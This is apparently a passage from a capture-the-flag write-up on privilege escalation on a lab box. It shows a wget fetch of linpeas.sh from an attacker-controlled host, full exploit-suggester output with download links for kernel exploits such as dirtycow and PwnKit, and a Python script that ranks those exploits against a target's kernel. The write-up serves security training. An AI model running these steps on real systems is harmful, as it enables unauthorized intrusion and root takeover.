PEAS
ircd@irked:/dev/shm$ wget http://10.10.14.10:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-01-24 14:41:58-- http://10.10.14.10:8000/linpeas.sh
Connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=====================>] 808.42K 3.97MB/s in 0.2s
2023-01-24 14:41:58 (3.97 MB/s) - ‘linpeas.sh’ saved [827827/827827]
Delivery complete
Executing PEAS
PEAS's exploit suggester flags the target as likely vulnerable to CVE-2021-4034 (PwnKit); the full suggester output follows.
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
download url: https://www.exploit-db.com/download/40611
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
download url: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
exposure: probable
tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: less probable
tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-0358] ntfs-3g-modprobe
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
exposure: less probable
tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-2384] usb-midi
details: https://xairy.github.io/blog/2016/cve-2016-2384
exposure: less probable
tags: ubuntu=14.04,fedora=22
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exposure: less probable
tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
download url: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exposure: less probable
download url: https://www.exploit-db.com/download/39230
[+] [CVE-2015-1328] overlayfs
details: http://seclists.org/oss-sec/2015/q2/717
exposure: less probable
tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
download url: https://www.exploit-db.com/download/37292
[+] [CVE-2014-5207] fuse_suid
details: https://www.exploit-db.com/exploits/34923/
exposure: less probable
download url: https://www.exploit-db.com/download/34923
[+] [CVE-2016-0728] keyring
details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exposure: less probable
download url: https://www.exploit-db.com/download/40003
comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
source: http://www.exploit-db.com/exploits/39230
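As an added triage step (example code written for this write-up, not part of linpeas or linux-exploit-suggester): each entry's `tags:` line encodes the distro versions and, in braces, the kernel builds the exploit was written against, and the `[ ... ]` brackets mark the part LES matched on the target. The script below parses the report shape shown above and re-checks every entry against the target's `ID`/`VERSION_ID` from /etc/os-release and `uname -r`, so entries whose kernel pin does not match can be dropped before anything is compiled. The matching rules are an approximation of LES's own, the sample report is a constructed subset of the output above, and the Debian 8 / 3.16 target values are assumed for illustration.

```python
"""Re-check linux-exploit-suggester findings against a target's distro/kernel.

Added example for this write-up; not code from linpeas or LES. The matching
rules approximate what LES does with its tags and are not LES's own code.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    cve: str
    name: str
    exposure: str = ""
    tags: str = ""
    download: str = ""


@dataclass
class Target:
    distro: str   # ID from /etc/os-release, e.g. "debian"
    version: str  # VERSION_ID from /etc/os-release, e.g. "8"
    kernel: str   # output of uname -r


# Constructed sample in the shape LES prints (subset of the report above).
SAMPLE_LES_OUTPUT = """\
[+] [CVE-2016-5195] dirtycow
   details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   exposure: highly probable
   tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   download url: https://www.exploit-db.com/download/40611
[+] [CVE-2021-4034] PwnKit
   details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   exposure: probable
   tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
"""

HEADER = re.compile(r"^\[\+\] \[(?P<cve>CVE-\d{4}-\d+)\] (?P<name>.+)$")
TAG = re.compile(r"^(?P<distro>[A-Za-z]+)(?:=(?P<vers>[^{]+))?(?:\{kernel:(?P<kern>.+)\})?$")
ORDER = {"no_match": 0, "distro_match": 1, "kernel_match": 2}


def parse_les(text):
    """Turn the '[+] [CVE-...] name' blocks into Finding records."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            findings.append(Finding(m["cve"], m["name"].strip()))
            continue
        if not findings or ":" not in line:
            continue
        key, _, value = line.partition(":")   # split at the first colon only; URLs keep theirs
        key, value = key.strip(), value.strip()
        if key == "exposure":
            findings[-1].exposure = value
        elif key == "tags":
            findings[-1].tags = value
        elif key == "download url":
            findings[-1].download = value
    return findings


def split_top_level(s, sep=","):
    """Split on sep, ignoring separators nested inside (...) or {...}."""
    parts, depth, cur = [], 0, []
    for ch in s:
        if ch in "({":
            depth += 1
        elif ch in ")}":
            depth -= 1
        if ch == sep and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p for p in parts if p.strip()]


def glob_to_regex(pattern):
    """LES kernel pins use '*' as a wildcard and (a|b) alternation; keep both, escape the rest."""
    out = []
    for ch in pattern:
        if ch == "*":
            out.append(".*")
        elif ch in "()|":
            out.append(ch)
        else:
            out.append(re.escape(ch))
    return "(?:" + "".join(out) + ")"


def match_tag(tag, target):
    """One tag -> kernel_match / distro_match / no_match for this target."""
    m = TAG.match(tag.strip())
    if not m or m["distro"].lower() != target.distro.lower():
        return "no_match"
    if m["vers"]:
        vers = m["vers"].strip().strip("()").split("|")
        # 'ubuntu=20' is treated as matching VERSION_ID 20.04 (assumed prefix rule)
        if not any(target.version == v or target.version.startswith(v + ".") for v in vers):
            return "no_match"
    if m["kern"]:
        # A pinned kernel that does not match means the patched build is likely in place.
        return "kernel_match" if re.fullmatch(glob_to_regex(m["kern"]), target.kernel) else "no_match"
    return "distro_match"


def rank(finding, target):
    """Best verdict over all of the finding's tags (brackets are LES's own match markers)."""
    best = "no_match"
    for tag in split_top_level(finding.tags.replace("[", "").replace("]", "")):
        verdict = match_tag(tag, target)
        if ORDER[verdict] > ORDER[best]:
            best = verdict
    return best


def triage(text, target):
    """Return [(cve, name, verdict)] with the strongest matches first."""
    rows = [(f.cve, f.name, rank(f, target)) for f in parse_les(text)]
    return sorted(rows, key=lambda r: -ORDER[r[2]])


if __name__ == "__main__":
    box = Target("debian", "8", "3.16.0-6-amd64")   # assumed values, not taken from the target
    for cve, name, verdict in triage(SAMPLE_LES_OUTPUT, box):
        print(f"{verdict:13} {cve} {name}")
```

On a real target, fill `Target` from /etc/os-release and `uname -r` and feed it the saved suggester section. LES's own ranking also considers per-exploit requirements that the printed report does not show, so even a `kernel_match` here still needs the package version checked by hand (for PwnKit, `pkexec --version` and the distro's advisory) before compiling anything.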
PEAS discovered some more vulnerabilities.
There are some compilers installed.
This is good news, as I wouldn't need to set up a docker container in case
PEAS was also able to enumerate those SUID binaries